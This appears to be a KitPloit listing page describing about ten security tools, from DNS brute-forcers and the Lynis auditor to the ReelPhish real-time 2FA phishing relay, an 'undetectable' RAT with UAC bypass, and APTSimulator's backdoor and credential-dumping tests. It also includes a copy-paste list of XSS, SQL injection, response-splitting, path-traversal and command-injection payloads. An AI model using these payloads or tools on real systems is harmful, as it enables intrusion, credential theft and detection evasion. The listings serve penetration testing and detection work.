Quantcast
Channel: KitPloit - PenTest Tools!
Viewing all 5854 articles
Browse latest View live

DNSspider - Very Fast, Async Mulithreaded Subdomain Scanner

$
0
0

A very fast multithreaded bruteforcer of subdomains that leverages a wordlist and/or character permutation.

CHANGELOG:

v0.9
  • use async multithreading via concurrent.futures module
  • attack while mutating -> don't generate whole list when using -t 1
  • log only the subdomains to logfile when '-r' was chosen
  • minor code clean-ups / refactoring
  • switch to tabstop=2 / shiftwidth=2

v0.8
  • upgraded to python3

v0.7
  • upgraded built-in wordlist (more than 2k)
  • remove annoying timeout warnings
  • remove color output when logging to file

v0.6
  • upgraded default wordlist
  • replaced optionparser with argparse
  • add version output option
  • fixed typo

v0.5
  • fixed extracted ip addresses from rrset answers
  • renamed file (removed version string)
  • removed trailing whitespaces
  • removed color output
  • changed banner

v0.4
  • fixed a bug for returned list
  • added postfix option
  • upgraded wordlist[]
  • colorised output
  • changed error messages

v0.3:
  • added verbose/quiet mode default is quiet now
  • fixed try/catch for domainnames
  • fixed some tab width (i normally use <= 80 chars per line)

v0.2:
  • append DNS and IP output to found list
  • added diffound list for subdomains resolved to different addresses
  • get right ip address from current used iface to avoid socket problems
  • fixed socket exception syntax and output
  • added usage note for fixed port and multithreaded socket exception

v0.1:
  • initial release  


ReelPhish - A Real-Time Two-Factor Phishing Tool

$
0
0

ReelPhish simplifies the real-time phishing technique. The primary component of the phishing tool is designed to be run on the attacker’s system. It consists of a Python script that listens for data from the attacker’s phishing site and drives a locally installed web browser using the Selenium framework. The tool is able to control the attacker’s web browser by navigating to specified web pages, interacting with HTML objects, and scraping content.

The secondary component of ReelPhish resides on the phishing site itself. Code embedded in the phishing site sends data, such as the captured username and password, to the phishing tool running on the attacker’s machine. Once the phishing tool receives information, it uses Selenium to launch a browser and authenticate to the legitimate website. All communication between the phishing web server and the attacker’s system is performed over an encrypted SSH tunnel.

Victims are tracked via session tokens, which are included in all communications between the phishing site and ReelPhish. This token allows the phishing tool to maintain states for authentication workflows that involve multiple pages with unique challenges. Because the phishing tool is state-aware, it is able to send information from the victim to the legitimate web authentication portal and vice versa.

This tool has been released along with a FireEye blog post. The blog post can be found at the following link: https://www.fireeye.com/blog/threat-research/2018/02/reelphish-real-time-two-factor-phishing-tool.html

Installation Steps
  1. The latest release of Python 2.7.x is required.
  2. Install Selenium, a required dependency to run the browser drivers.
    • pip install -r requirements.txt
  3. Download browser drivers for all web browsers you plan to use. Binaries should be placed in this root directory with the following naming scheme.
    • Internet Explorer: www.seleniumhq.org/download/
      • Download the Internet Explorer Driver Server for 32 bit Windows IE. Unzip the file and rename the binary to: IEDriver.exe.
      • In order for the Internet Explorer Driver to work, be sure protected mode is disabled. On IE11 (64 bit Windows), you must create registry key "HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BFCACHE". In this key, create a DWORD value named iexplore.exe and set the value to 0.
      • Further information on Internet Explorer requirements can be found on www.github.com/SeleniumHQ/selenium/wiki/InternetExplorerDriver
    • Firefox:www.github.com/mozilla/geckodriver/releases/
      • Download the latest release of the Firefox GeckoDriver for Windows 32 bit. Unzip the file and rename the binary to: FFDriver.exe.
        • On Linux systems, download the Linux version of Firefox GeckoDriver and rename the binary to: FFDriver.bin . Linux support is experimental.
      • Gecko Driver has special requirements. Copy FFDriver.exe to geckodriver.exe and place it into your PATH variable. Additionally, add firefox.exe to your PATH variable.
    • Chrome: https://chromedriver.storage.googleapis.com/index.html?path=2.35/
      • Download the latest release of the Google Chrome Driver for Windows 32 bit. Unzip the file and rename the binary to: ChromeDriver.exe.
        • On Linux systems, download the Linux version of the Chrome Web Driver and rename the binary to: ChromeDriver.bin . Linux support is experimental.

Running ReelPhish
ReelPhish consists of two components: the phishing site handling code and this script. The phishing site can be designed as desired. Sample PHP code is provided in /examplesitecode. The sample code will take a username and password from a HTTP POST request and transmit it to the phishing script.
The phishing script listens on a local port and awaits a packet of credentials. Once credentials are received, the phishing script will open a new web browser instance and navigate to the desired URL (the actual site where you will be entering a user's credentials). Credentials will be submitted by the web browser.
The recommended way of handling communication between the phishing site and this script is by using a reverse SSH tunnel. This is why the example PHP phishing site code submits credentials to localhost:2135.

ReelPhish Arguments
  1. You must specify the browser you will be using with the --browser parameter. Supported browsers include Internet Explorer ("--browser IE"), Firefox ("--browser FF"), and Chrome ("--browser Chrome"). Windows and Linux are both supported. Chrome requires the least amount of setup steps. See above installation instructions for further details.
  2. You must specify the URL. The script will navigate to this URL and submit credentials on your behalf.
  3. Other optional parameters are available.
    • Set the logging parameter to debug (--logging debug) for verbose event logging
    • Set the submit parameter (--submit) to customize the element that is "clicked" by the browser
    • Set the override parameter (--override) to ignore missing form elements
    • Set the numpages parameter (--numpages) to increase the number of authentication pages (see below section)

Multi Page Authentication Support
ReelPhish supports multiple authentication pages. For example, in some cases a two factor authentication code may be requested on a second page. To implement this feature, be sure that --numpages is set to the number of authentication pages. Also be sure that the session ID is properly tracked on your phishing site. The session ID is used to track users as they proceed through each step of authentication.
In some cases, you may need to scrape specific content (such as a challenge code) off of a particular authentication page. Example commented out code is provided in ReelPhish.py to perform a scraping operation.


Pymap-Scanner - Python Scanner with GUI

$
0
0

Python-based port scanner with Pyqt4 user interface.

Features
  • Basic Gui
  • Speed Scan
  • Custom Services
  • User Control
  • Error Control
  • Useful parameters
  • And More.

Installation Modules
$ Pyqt4
$ Nmap

Requirements(Third)
[+]xsltproc


Lynis 2.6.2 - Security Auditing Tool for Unix/Linux Systems

$
0
0

We are excited to announce this major release of auditing tool Lynis. Several big changes have been made to core functions of Lynis. These changes are the next of simplification improvements we made. There is a risk of breaking your existing configuration.

Lynis is an open source security auditing tool. Used by system administrators, security professionals, and auditors, to evaluate the security defenses of their Linux and UNIX-based systems. It runs on the host itself, so it performs more extensive security scans than vulnerability scanners.

Supported operating systems

The tool has almost no dependencies, therefore it runs on almost all Unix-based systems and versions, including:
  • AIX
  • FreeBSD
  • HP-UX
  • Linux
  • Mac OS
  • NetBSD
  • OpenBSD
  • Solaris
  • and others
It even runs on systems like the Raspberry Pi and several storage devices!

Installation optional

Lynis is light-weight and easy to use. Installation is optional: just copy it to a system, and use "./lynis audit system" to start the security scan. It is written in shell script and released as open source software (GPL). 

How it works

Lynis performs hundreds of individual tests, to determine the security state of the system. The security scan itself consists of performing a set of steps, from initialization the program, up to the report.

Steps
  1. Determine operating system
  2. Search for available tools and utilities
  3. Check for Lynis update
  4. Run tests from enabled plugins
  5. Run security tests per category
  6. Report status of security scan
Besides the data displayed on the screen, all technical details about the scan are stored in a log file. Any findings (warnings, suggestions, data collection) are stored in a report file.

Opportunistic Scanning

Lynis scanning is opportunistic: it uses what it can find.
For example, if it sees you are running Apache, it will perform an initial round of Apache related tests. When during the Apache scan it also discovers an SSL/TLS configuration, it will perform additional auditing steps on that. While doing that, it then will collect discovered certificates so they can be scanned later as well.

In-depth security scans

By performing opportunistic scanning, the tool can run with almost no dependencies. The more it finds, the deeper the audit will be. In other words, Lynis will always perform scans which are customized to your system. No audit will be the same!

Use cases

Since Lynis is flexible, it is used for several different purposes. Typical use cases for Lynis include:
  • Security auditing
  • Compliance testing (e.g. PCI, HIPAA, SOx)
  • Vulnerability detection and scanning
  • System hardening

Resources used for testing

Many other tools use the same data files for performing tests. Since Lynis is not limited to a few common Linux distributions, it uses tests from standards and many custom ones not found in any other tool.
  • Best practices
  • CIS
  • NIST
  • NSA
  • OpenSCAP data
  • Vendor guides and recommendations (e.g. Debian Gentoo, Red Hat)

Lynis Plugins

Plugins enable the tool to perform additional tests. They can be seen as an extension (or add-on) to Lynis, enhancing its functionality. One example is the compliance checking plugin, which performs specific tests only applicable to some standard.

Changelog
Upgrade note
Changes:
--------
* Bugfix for Arch Linux (binary detection)
* Textual changes for several tests
* Update of tests database


Whapa - WhatsApp DataBase Parser Tool

$
0
0

Whapa is a whatsapp database parser that automates the process. The main purpose of whapa is to present the data handled by the Sqlite database in a way that is comprehensible to the analyst. The Script is written in Python 2.x
The software is divided into three modes:
  • Message Mode: It analyzes all messages in the database, applying different filters. It extracts thumbnails when they're availables.
  • Decryption Mode: Decrypt crypto12 databases as long as we have the key.
  • Info Mode: Displays different information about statuses, broadcasts list and groups.
Please note that this project is an early stage. As such, you could find errors. Use it at your own risk!
Bonus: It also comes with a tool to download the backup copies of google drive associated with a smartphone.
  • "Whapas.py" is the spanish version of "whapa.py"

Installation

whapa.py (Whatsapp parser)
You can download the latest version of whapa by cloning the GitHub repository:
git clone https://github.com/B16f00t/whapa.git
then:
pip install -r requirements.txt

whagdext.py (Extracts datas from Google Drive Account)
sudo apt-get update
sudo apt-get install -y python3-pip
sudo pip3 install pyportify
To usage:
config settings.cfg
[auth]
gmail = alias@gmail.com
passw = yourpassword
python3 whagdext.py "arguments"

Usage
     __      __.__          __________         
/ \ / \ |__ _____ \______ \_____
\ \/\/ / | \\__ \ | ___/\__ \
\ /| Y \/ __ \| | / __ \_
\__/\ / |___| (____ /____| (____ /
\/ \/ \/ \/
---------- Whatsapp Parser v0.2 -----------

usage: whapa.py [-h] [-k KEY | -i | -m] [-t TEXT] [-u USER] [-g GROUP] [-w]
[-s] [-b] [-tS TIME_START] [-tE TIME_END]
[-tT | -tI | -tA | -tV | -tC | -tL | -tX | -tP | -tG | -tD | -tR]
[DATABASE]

To start choose a database and a mode with options

positional arguments:
DATABASE database file path - './msgstore.db' by default

optional arguments:
-h, --help show this help message and exit
-k KEY, --key KEY *** Decrypt Mode *** - key file path
-i, --info *** Info Mode ***
-m, --messages *** Message Mode ***
-t TEXT, --text TEXT filter messages by text match
-u USER, --user USER filter messages made by a phone number
-g GROUP, --group GROUP
filter messages made in a group number
-w, --web filter messages made by Whatsapp Web
-s, --starred filter messages starred by user
-b, --broadcast filter messages send by broadcast
-tS TIME_START, --time_start TIME_START
filter messages by start time (dd-mm-yyyy HH:MM)
-tE TIME_END, --time_end TIME_END
filter messages by end time (dd-mm-yyyy HH:MM)
-tT, --type_text filter text messages
-tI, --type_image filter image messages
-tA, --type_audio filter audio messages
-tV, --type_video filter video messages
-tC, --type_contact filter contact messages
-tL, --type_location filter location messages
-tX, --type_call filter audio/video call messages
-tP, --type_application
filter application messages
-tG, --type_gif filter GIF messages
-tD, --type_deleted filter deleted object messages
-tR, --type_share filter Real time location messages

Examples
("./Media" is the directory where thumbnails is being written)
  • Message mode:
      python whapa.py -m 
    Show all messages from the database.
      python whapa.py -m -tS "12-12-2017 12:00" -tE "13-12-2017 12:00"
    Show all messages from 12-12-2017 12:00 to 13-12-2017 12:00.
      python whapa.py -m -w -tI
    Show all images send by Whatsapp Web.
  • Decrypt mode:
      python whapa.py msgstore.db.crypt12 -k key
    Decrypt msgstore.dbcrypt12, creating msgstore.db
  • Info mode:
      python whapa.py -i
    Show a stage with options about groups, broadcast lists and statuses.


Parat - Python Based Remote Administration Tool (RAT)

$
0
0

Parat is a simple remote administration tool (RAT) written in python.
Also you can read wiki!

Change log:
  • Compatible with both python 2 and 3 versions(dont forget that may causes some error.so please share us any error(s))

Do you want to try?
Copy and paste on your terminal:
git clone https://github.com/micle-fm/Parat && cd Parat && python main.py
Note: it may need to install python -m easy_install pypiwin32 on some targets.

Features
  • Fully UnDetectable(FUD)
  • Compatible with Telegram messanger
  • Bypass windows User Account Control(UAC)
  • Memory executation
  • No any requirments to setup

Telegram
You can communicate parat using telegram messanger. For this do steps:
  1. Open telegram.service file by an editor
  2. Insert your bot token on line 15, replaced on YOUR_BOT_TOKEN
  3. Run telegram.service by typing: python telegram.service
  4. Now you can use your bot to control parat :) 

APTSimulator - A toolset to make a system look as if it was the victim of an APT attack

$
0
0

APT Simulator is a Windows Batch script that uses a set of tools and output files to make a system look as if it was compromised.

Use Cases
  1. POCs: Endpoint detection agents / compromise assessment tools
  2. Test your security monitoring's detection capabilities
  3. Test your SOCs response on a threat that isn't EICAR or a port scan
  4. Prepare an environment for digital forensics classes

Motives
Customers tested our scanners in a POC and sent us a complaint that our scanners didn't report on programs that they had installed on their test systems. They had installed an Nmap, dropped a PsExec.exe in the Downloads folder and placed on EICAR test virus on the user's Desktop. That was the moment when I decided to build a tool that simulates a real threat in a more appropriate way.

Why Batch?
  • Because it's simple: Everyone can read, modify or extend it
  • It runs on every Windows system without any prerequisites
  • It is closest to a real attacker working on the command line

Focus
The focus of this tool is to simulate adversary activity, not malware.


Getting Started
  1. Download the latest release from the "release" section
  2. Extract the package on a demo system (Password: apt)
  3. Start a cmd.exe as Administrator
  4. Navigate to the extracted program folder and run APTSimulator.bat

Avoiding Early Detection
The batch script extracts the tools and shells from an encrypted 7z archive at runtime. Do not download the master repo using the "download as ZIP" button. Instead use the official release from the release section.

Extending the Test Set
Since version 0.4 it is pretty easy to extend the test sets by adding a single .bat file to one of the test-set category folders.
E.g. If you want to write a simple use case for "privilege escalation", that uses a tool named "privesc.exe", clone the repo and do the following:
  1. Add you tool to the toolset folder
  2. Write a new batch script privesc-1.bat and add it to the ./test-sets/privilege-escalation folder
  3. Run build_pack.bat
  4. Add your test to the table and action list in the README.md
  5. Create a pull request

Tool and File Extraction
If you script includes a tool, web shell, auxiliary or output file, place them in the folders ./toolset or ./workfiles. Running the build script build_pack.bat will include them in the encrypted archives enc-toolset.7z and enc-files.7z.

Extract a Tool
%ZIP% e -p%PASS% %TOOLARCH% -aoa -o%APTDIR% toolset\tool.exe > NUL

Extract a File
%ZIP% e -p%PASS% %FILEARCH% -aoa -o%APTDIR% workfile\tool-output.txt > NUL

Detection
The following table shows the different test cases and the expected detection results.
  • AV = Antivirus
  • NIDS = Network Intrusion Detection System
  • EDR = Endpoint Detection and Response
  • SM = Security Monitoring
  • CA = Compromise Assessment
Test CaseAVNIDSEDRSMCA
Dumps (Pwdump, Dir Listing)X
Recon Activity (Typical Commands)XXX
DNS (Cache Injection)(X)XXX
Eventlog (WCE entries)XXX
Hosts File (AV/Win Update blocks)(X)XX
Backdoor (StickyKey file/debugger)XX
Obfuscation (RAR with JPG ext)(X)
Web Shells (a good selection)X(X)X
Ncat Alternative (Drop & Exec)XXXX
Remote Execution Tool (Drop)(X)X
Mimikatz (Drop & Exec)XXXX
PsExec (Drop & Exec)XXX
At Job CreationXXX
RUN Key Entry CreationXXX
System File in Susp Loc (Drop & Exec)XXX
Guest User (Activation & Admin)XXX
LSASS Dump (with Procdump)XXX
C2 Requests(X)XXX
Malicious User Agent (Malware, RATs)XXX
Scheduled Task CreationXXX
Nbtscan Discovery (Scan & Output)XX(X)X

Test Cases

1. Dumps
  • drops pwdump output to the working dir
  • drops directory listing to the working dir

2. Recon
  • Executes command used by attackers to get information about a target system

3. DNS
  • Looks up several well-known C2 addresses to cause DNS requests and get the addresses into the local DNS cache

4. Eventlog
  • Creates Windwows Eventlog entries that look as if WCE had been executed

5. Hosts
  • Adds entries to the local hosts file (update blocker, entries caused by malware)

6. Sticky Key Backdoor
  • Tries to replace sethc.exe with cmd.exe (a backup file is created)
  • Tries to register cmd.exe as debugger for sethc.exe

7. Obfuscation
  • Drops a cloaked RAR file with JPG extension

8. Web Shells
  • Creates a standard web root directory
  • Drops standard web shells to that diretory
  • Drops GIF obfuscated web shell to that diretory

9. Ncat Alternative
  • Drops a PowerShell Ncat alternative to the working directory

10. Remote Execution Tool
  • Drops a remote execution tool to the working directory

11. Mimikatz
  • Dumps mimikatz output to working directory (fallback if other executions fail)
  • Run special version of mimikatz and dump output to working directory
  • Run Invoke-Mimikatz in memory (github download, reflection)

12. PsExec
  • Dump a renamed version of PsExec to the working directory
  • Run PsExec to start a command line in LOCAL_SYSTEM context

13. At Job
  • Creates an at job that runs mimikatz and dumps credentials to file

14. RUN Key
  • Create a suspicious new RUN key entry that dumps "net user" output to a file

15. System File Suspicious Location
  • Drops suspicious executable with system file name (svchost.exe) in %PUBLIC% folder
  • Runs that suspicious program in %PUBLIC% folder

16. Guest User
  • Activates Guest user
  • Adds Guest user to the local administrators

17. LSASS DUMP
  • Dumps LSASS process memory to a suspicious folder

18. C2 Requests
  • Uses Curl to access well-known C2 servers

19. Malicious User Agents
  • Uses malicious user agents to access web sites

20. Scheduled Task Creation
  • Creates a scheduled task that runs mimikatz and dumps the output to a file

21. Nbtscan Discovery
  • Scanning 3 private IP address class-C subnets and dumping the output to the working directory

Warning
This repo contains tools and executables that can harm your system's integrity and stability. Do only use them on non-productive test or demo systems.

Screenshots





Advanced Solutions
The CALDERA automated adversary emulation system https://github.com/mitre/caldera
Infection Monkey - An automated pentest tool https://github.com/guardicore/monkey
Flightsim - A utility to generate malicious network traffic and evaluate controls https://github.com/alphasoc/flightsim

Integrated Projects / Software


IntruderPayloads - A Collection Of Burpsuite Intruder Payloads, Fuzz Lists And File Uploads

$
0
0

A collection of Burpsuite Intruder payloads and fuzz lists and pentesting methodology. To pull down all 3rd party repos, run install.sh in the same directory of the IntruderPayloads folder.

Author: 1N3@CrowdShield https://crowdshield.com

PENTEST METHODOLOGY v2.0

BASIC PASSIVE AND ACTIVE CHECKS:
  • Burpsuite Spider with intelligent form submission
  • Manual crawl of website through Burpsuite proxy and submitting INJECTX payloads for tracking
  • Burpsuite passive scan
  • Burpsuite engagement tools > Search > <form|<input|url=|path=|load=|INJECTX|Found|<!--|Exception|Query|ORA|SQL|error|Location|crowdshield|xerosecurity|username|password|document\.|location\.|eval\(|exec\(|\?wsdl|\.wsdl
  • Burpsuite engagement tools > Find comments
  • Burpsuite engagement tools > Find scripts
  • Burpsuite engagement tools > Find references
  • Burpsuite engagement tools > Analyze target
  • Burpsuite engagement tools > Discover content
  • Burpsuite Intruder > file/directory brute force
  • Burpsuite Intruder > HTTP methods, user agents, etc.
  • Enumerate all software technologies, HTTP methods, and potential attack vectors
  • Understand the function of the site, what types of data is stored or valuable and what sorts of functions to attack, etc.

ENUMERATION:
  • OPERATING SYSTEM
  • WEB SERVER
  • DATABASE SERVERS
  • PROGRAMMING LANGUAGES
  • PLUGINS/VERSIONS
  • OPEN PORTS
  • USERNAMES
  • SERVICES
  • WEB SPIDERING
  • GOOGLE HACKING

VECTORS:
  • INPUT FORMS
  • GET/POST PARAMS
  • URI/REST STRUCTURE
  • COOKIES
  • HEADERS

SEARCH STRINGS:
Just some helpful regex terms to search for passively using Burpsuite or any other web proxy...
fname|phone|id|org_name|name|email

QUICK ATTACK STRINGS:
Not a complete list by any means, but when you're manually testing and walking through sites and need a quick copy/paste, this can come in handy...
Company
First Last
username
username@mailinator.com
Password123$
+1416312384
google.com
https://google.com
//google.com
.google.com
https://google.com/.injectx/rfi_vuln.txt
https://google.com/.injectx/rfi_vuln.txt?`whoami`
https://google.com/.injectx/rfi_vuln.txt.png
https://google.com/.injectx/rfi_vuln.txt.html
12188
01/01/1979
4242424242424242
INJECTX
'>"></INJECTX>(1)
javascript:alert(1)//
"><img/onload=alert(1)>' --
"></textarea><img/onload=alert(1)>' --
INJECTX'>"><img/src="https://google.com/.injectx/xss_vuln.png"></img>
'>"><iframe/onload=alert(1)></iframe>
INJECTX'>"><ScRiPt>confirm(1)<ScRiPt>
"></textarea><img/onload=alert(1)>' -- // INJECTX <!--
"><img/onload=alert(1)>' -- // INJECTX <!--
INJECTX'"><h1>X<!--
INJECTX"><h1>X
en%0AContent-Length%3A%200%0A%0AHTTP%2F1.1%20200%20OK%0AContent-Type%3A%20text%2Fhtml%0AContent-Length%3A%2020%0A%3Chtml%3EINJECTX%3C%2Fhtml%3E%0A%0A
%0AContent-Length%3A%200%0A%0AHTTP%2F1.1%20200%20OK%0AContent-Type%3A%20text%2Fhtml%0AContent-Length%3A%2020%0A%3Chtml%3EINJECTX%3C%2Fhtml%3E%0A%0A
../../../../../../../../../../../etc/passwd
{{4+4}}
sleep 5; sleep 5 || sleep 5 | sleep 5 & sleep 5 && sleep 5
admin" or "1"="1"--
admin' or '1'='1'--
firstlastcompany%0a%0d

OWASP TESTING CHECKLIST:
  • Spiders, Robots and Crawlers IG-001
  • Search Engine Discovery/Reconnaissance IG-002
  • Identify application entry points IG-003
  • Testing for Web Application Fingerprint IG-004
  • Application Discovery IG-005
  • Analysis of Error Codes IG-006
  • SSL/TLS Testing (SSL Version, Algorithms, Key length, Digital Cert. Validity) - SSL Weakness CM‐001
  • DB Listener Testing - DB Listener weak CM‐002
  • Infrastructure Configuration Management Testing - Infrastructure Configuration management weakness CM‐003
  • Application Configuration Management Testing - Application Configuration management weakness CM‐004
  • Testing for File Extensions Handling - File extensions handling CM‐005
  • Old, backup and unreferenced files - Old, backup and unreferenced files CM‐006
  • Infrastructure and Application Admin Interfaces - Access to Admin interfaces CM‐007
  • Testing for HTTP Methods and XST - HTTP Methods enabled, XST permitted, HTTP Verb CM‐008
  • Credentials transport over an encrypted channel - Credentials transport over an encrypted channel AT-001
  • Testing for user enumeration - User enumeration AT-002
  • Testing for Guessable (Dictionary) User Account - Guessable user account AT-003
  • Brute Force Testing - Credentials Brute forcing AT-004
  • Testing for bypassing authentication schema - Bypassing authentication schema AT-005
  • Testing for vulnerable remember password and pwd reset - Vulnerable remember password, weak pwd reset AT-006
  • Testing for Logout and Browser Cache Management - - Logout function not properly implemented, browser cache weakness AT-007
  • Testing for CAPTCHA - Weak Captcha implementation AT-008
  • Testing Multiple Factors Authentication - Weak Multiple Factors Authentication AT-009
  • Testing for Race Conditions - Race Conditions vulnerability AT-010
  • Testing for Session Management Schema - Bypassing Session Management Schema, Weak Session Token SM-001
  • Testing for Cookies attributes - Cookies are set not ‘HTTP Only’, ‘Secure’, and no time validity SM-002
  • Testing for Session Fixation - Session Fixation SM-003
  • Testing for Exposed Session Variables - Exposed sensitive session variables SM-004
  • Testing for CSRF - CSRF SM-005
  • Testing for Path Traversal - Path Traversal AZ-001
  • Testing for bypassing authorization schema - Bypassing authorization schema AZ-002
  • Testing for Privilege Escalation - Privilege Escalation AZ-003
  • Testing for Business Logic - Bypassable business logic BL-001
  • Testing for Reflected Cross Site Scripting - Reflected XSS DV-001
  • Testing for Stored Cross Site Scripting - Stored XSS DV-002
  • Testing for DOM based Cross Site Scripting - DOM XSS DV-003
  • Testing for Cross Site Flashing - Cross Site Flashing DV-004
  • SQL Injection - SQL Injection DV-005
  • LDAP Injection - LDAP Injection DV-006
  • ORM Injection - ORM Injection DV-007
  • XML Injection - XML Injection DV-008
  • SSI Injection - SSI Injection DV-009
  • XPath Injection - XPath Injection DV-010
  • IMAP/SMTP Injection - IMAP/SMTP Injection DV-011
  • Code Injection - Code Injection DV-012
  • OS Commanding - OS Commanding DV-013
  • Buffer overflow - Buffer overflow DV-014
  • Incubated vulnerability - Incubated vulnerability DV-015
  • Testing for HTTP Splitting/Smuggling - HTTP Splitting, Smuggling DV-016
  • Testing for SQL Wildcard Attacks - SQL Wildcard vulnerability DS-001
  • Locking Customer Accounts - Locking Customer Accounts DS-002
  • Testing for DoS Buffer Overflows - Buffer Overflows DS-003
  • User Specified Object Allocation - User Specified Object Allocation DS-004
  • User Input as a Loop Counter - User Input as a Loop Counter DS-005
  • Writing User Provided Data to Disk - Writing User Provided Data to Disk DS-006
  • Failure to Release Resources - Failure to Release Resources DS-007
  • Storing too Much Data in Session - Storing too Much Data in Session DS-008
  • WS Information Gathering - N.A. WS-001
  • Testing WSDL - WSDL Weakness WS-002
  • XML Structural Testing - Weak XML Structure WS-003
  • XML content-level Testing - XML content-level WS-004
  • HTTP GET parameters/REST Testing - WS HTTP GET parameters/REST WS-005
  • Naughty SOAP attachments - WS Naughty SOAP attachments WS-006
  • Replay Testing - WS Replay Testing WS-007
  • AJAX Vulnerabilities - N.A. AJ-001
  • AJAX Testing - AJAX weakness AJ-002

LOW SEVERITY:
A list of low severity findings that are likely out of scope for most bug bounty programs but still helpful to reference for normal web penetration tests.
  • Descriptive error messages (e.g. Stack Traces, application or server errors).
  • HTTP 404 codes/pages or other HTTP non-200 codes/pages.
  • Banner disclosure on common/public services.
  • Disclosure of known public files or directories, (e.g. robots.txt).
  • Click-Jacking and issues only exploitable through click-jacking.
  • CSRF on forms which are available to anonymous users (e.g. the contact form).
  • Logout Cross-Site Request Forgery (logout CSRF).
  • Presence of application or web browser ‘autocomplete’ or ‘save password’ functionality.
  • Lack of Secure and HTTPOnly cookie flags.
  • Lack of Security Speedbump when leaving the site.
  • Weak Captcha / Captcha Bypass
  • Username enumeration via Login Page error message
  • Username enumeration via Forgot Password error message
  • Login or Forgot Password page brute force and account lockout not enforced.
  • OPTIONS / TRACE HTTP method enabled
  • SSL Attacks such as BEAST, BREACH, Renegotiation attack
  • SSL Forward secrecy not enabled
  • SSL Insecure cipher suites
  • The Anti-MIME-Sniffing header X-Content-Type-Options
  • Missing HTTP security headers
  • Security best practices without accompanying Proof-of-Concept exploitation
  • Descriptive error messages (e.g. Stack Traces, application or server errors).
  • HTTP 404 codes/pages or other HTTP non-200 codes/pages.
  • Denial of Service Attacks.
  • Fingerprinting / banner disclosure on common/public services.
  • Disclosure of known public files or directories, (e.g. robots.txt).
  • Clickjacking and issues only exploitable through clickjacking.
  • CSRF on non-sensitive forms.
  • Logout Cross-Site Request Forgery (logout CSRF).
  • Presence of application or web browser ‘autocomplete’ or ‘save password’ functionality.
  • Lack of Secure/HTTPOnly flags on non-sensitive Cookies.
  • Lack of Security Speedbump when leaving the site.
  • Weak Captcha / Captcha Bypass
  • Login or Forgot Password page brute force and account lockout not enforced.
  • OPTIONS HTTP method enabled
  • HTTPS Mixed Content Scripts
  • Known vulnerable libraries
  • Attacks on Third Party Ad Services
  • Username / email enumeration via Forgot Password or Login page
  • Missing HTTP security headers
  • Strict-Transport-Security Not Enabled For HTTPS
  • X-Frame-Options
  • X-XSS-Protection
  • X-Content-Type-Options
  • Content-Security-Policy, X-Content-Security-Policy, X-WebKit-CSP
  • Content-Security-Policy-Report-Only
  • SSL Issues, e.g.
  • SSL Attacks such as BEAST, BREACH, Renegotiation attack
  • SSL Forward secrecy not enabled
  • SSL weak / insecure cipher suites
  • Lack of SPF records (Email Spoofing)
  • Auto-complete enabled on password fields
  • HTTP enabled
  • Session ID or Login Sent Over HTTP
  • Insecure Cookies
  • Cross-Domain.xml Allows All Domains
  • HTML5 Allowed Domains
  • Cross Origin Policy
  • Content Sniffing Not Disabled
  • Password Reset Account Enumeration
  • HTML Form Abuse (Denial of Service)
  • Weak HSTS Age (86,000 or less)
  • Lack of Password Security Policy (Brute Forcable Passwords)
  • Physical Testing
  • Denial of service attacks
  • Resource Exhaustion attacks
  • Issues related to rate limiting
  • Login or Forgot Password page brute force and account lockout not enforced
  • api*.netflix.com listens on port 80
  • Cross-domain access policy scoped to *.netflix.com
  • Username / Email Enumeration
  • via Login Page error message
  • via Forgot Password error message
  • via Registration
  • Weak password
  • Weak Captcha / Captcha bypass
  • Lack of Secure/HTTPOnly flags on cookies
  • Cookie valid after logout
  • Cookie valid after password reset
  • Cookie expiration
  • Forgot password autologin
  • Autologin token reuse
  • Same Site Scripting
  • SSL Issues, e.g.
  • SSL Attacks such as BEAST, BREACH, Renegotiation attack
  • SSL Forward secrecy not enabled
  • SSL weak / insecure cipher suites
  • SSL vulnerabilities related to configuration or version
  • Descriptive error messages (e.g. Stack Traces, application or server errors).
  • HTTP 404 codes/pages or other HTTP non-200 codes/pages.
  • Fingerprinting/banner disclosure on common/public services.
  • Disclosure of known public files or directories, (e.g. robots.txt).
  • Clickjacking and issues only exploitable through clickjacking.
  • CSRF on forms that are available to anonymous users (e.g. the contact form).
  • Logout Cross-Site Request Forgery (logout CSRF).
  • Missing CSRF protection on non-sensitive functionality
  • Presence of application or web browser ‘autocomplete’ or ‘save password’ functionality.
  • Incorrect Charset
  • HTML Autocomplete
  • OPTIONS HTTP method enabled
  • TRACE HTTP method enabled
  • Missing HTTP security headers, specifically
  • (https://www.owasp.org/index.php/List_of_useful_HTTP_headers), e.g.
  • Strict-Transport-Security
  • X-Frame-Options
  • X-XSS-Protection
  • X-Content-Type-Options
  • Content-Security-Policy, X-Content-Security-Policy, X-WebKit-CSP
  • Content-Security-Policy-Report-Only
  • Issues only present in old browsers/old plugins/end-of-life software browsers
  • IE < 9
  • Chrome < 40
  • Firefox < 35
  • Safari < 7
  • Opera < 13
  • Vulnerability reports related to the reported version numbers of web servers, services, or frameworks



Altdns - Generates permutations, alterations and mutations of subdomains and then resolves them

$
0
0
Altdns is a DNS recon tool that allows for the discovery of subdomains that conform to patterns. Altdns takes in words that could be present in subdomains under a domain (such as test, dev, staging) as well as takes in a list of subdomains that you know of.
From these two lists that are provided as input to altdns, the tool then generates a massive output of "altered" or "mutated" potential subdomains that could be present. It saves this output so that it can then be used by your favourite DNS bruteforcing tool.
Alternatively, the -r flag can be passed to altdns so that once this output is generated, the tool can then resolve these subdomains (multi-threaded) and save the results to a file.
Altdns works best with large datasets. Having an initial dataset of 200 or more subdomains should churn out some valid subdomains via the alterations generated.

Installation
pip install -r requirements.txt

Usage
# ./altdns.py -i subdomains.txt -o data_output -w words.txt -r -s results_output.txt
  • subdomains.txt contains the known subdomains for an organization
  • data_output is a file that will contain the massive list of altered and permuted subdomains
  • words.txt is your list of words that you'd like to permute your current subdomains with (i.e. admin, staging, dev, qa) - one word per line
  • the -r command resolves each generated, permuted subdomain
  • the -s command tells altdns where to save the results of the resolved permuted subdomains. results_output.txt will contain the final list of permuted subdomains found that are valid and have a DNS record.
  • the -t command limits how many threads the resolver will use simultaneously
  • -d 1.2.3.4 overrides the system default DNS resolver and will use the specified IP address as the resolving server. Setting this to the authoritative DNS server of the target domain may increase resolution performance

Screenshots




ezsploit - Linux Bash Script Automation For Metasploit

$
0
0


Command line script for automating metasploit functions:
  • Checks for metasploit service and starts if not present
  • Easily craft meterpreter reverse_tcp payloads for Windows, Linux, Android and Mac
  • Start multiple meterpreter reverse_tcp listners
